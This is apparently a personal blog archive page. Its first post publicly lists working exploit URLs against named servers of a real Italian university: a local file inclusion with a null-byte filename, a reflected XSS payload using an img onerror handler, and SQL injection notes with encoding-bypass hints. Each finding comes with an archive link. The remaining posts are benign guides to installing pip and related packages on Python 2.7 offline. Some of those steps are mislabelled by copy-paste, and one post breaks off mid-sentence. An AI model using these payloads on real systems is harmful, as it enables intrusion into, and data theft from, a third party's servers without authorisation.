Skip to main content

Posts

Showing posts from November, 2021

ding.unisannio.it | local file inclusion, sql injection, xss

  Local file inclusion  http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?frameset&bib=bibtexbrowser.php http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?bib=[filename%00] archived: https://archive.ph/wip/bUcUv   XSS http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?frameset&bib=%3Cimg%20src=/%20onerror=%22alert(1)%22%3E  Archived: https://archive.md/wip/WJf5b  (Guagliunastri. ... a fragol', a limon'! - Un grande il prof. Villano) -----  http://old.ing.unisannio.it/ects/scheda_en.php?1565 we can specify a column with the parameters http://old.ing.unisannio.it/ects/scheda_en.php?studenti archived: https://archive.ph/wip/zKWmP There is a need to bypass the url encoding and we cannot use spaces. --- %'% http://old.ing.unisannio.it/cerca_persone/index.php ---

Install pip and urllib3 on python 2.7 / 2.9 offline (linux or windows)

 Download pip 20.3.4 (latest for 2.x) https://pypi.org/simple/pip/  Decompress the file and then run python setup.py install ----   Download certifi, preferring the whl version that doesn't give a lot of problems You can choose the latest (as long as it works) and then run the following command (the filename depends on what you downloaded): pip install certifi-2021.10.8-py2.py3-none-any.whl https://pypi.org/simple/certifi/   Download certifi, preferring the whl version that doesn't give a lot of problems You can choose the latest (as long as it works) and then run the following command (the filename depends on what you downloaded): pip install setuptools-44.1.1-py2.py3-none-any.whl https://pypi.org/project/setuptools/44.1.1/#files Download certifi, preferring the whl version that doesn't give a lot of problems You can choose the latest (as long as it works) and then run the following command (the filename depends on what you downloaded): pip install urllib3-1.26.7-py2.py3-n

How to Install pip on Python 2.7 Offline Without get-pip.py: Step-by-Step Guide

How to Install pip on Python 2.7 Offline without get-pip.py If you're using Python 2.7 and need to install pip offline without using get-pip.py, follow these steps: Step 1: Download the pip Package Download the pip package from the official GitHub repository at https://github.com/pypa/pip/tree/20.3.4 . The version 20.3.4 is the latest version that works with Python 2.7.x. Note: You can download the package on any device with internet access and transfer it to the target machine via USB drive, network share, or any other preferred method. Step 2: Extract the Package Once the package has been downloaded, extract it to a folder on the target machine. Note: You can extract the package using any standard archive utility software such as WinZip, WinRAR, 7-Zip, or any other similar tool. Step 3: Install pip After the package has been extracted, open a command prompt or terminal and navigate to the folder containing the extracted files. Run the following command: pyth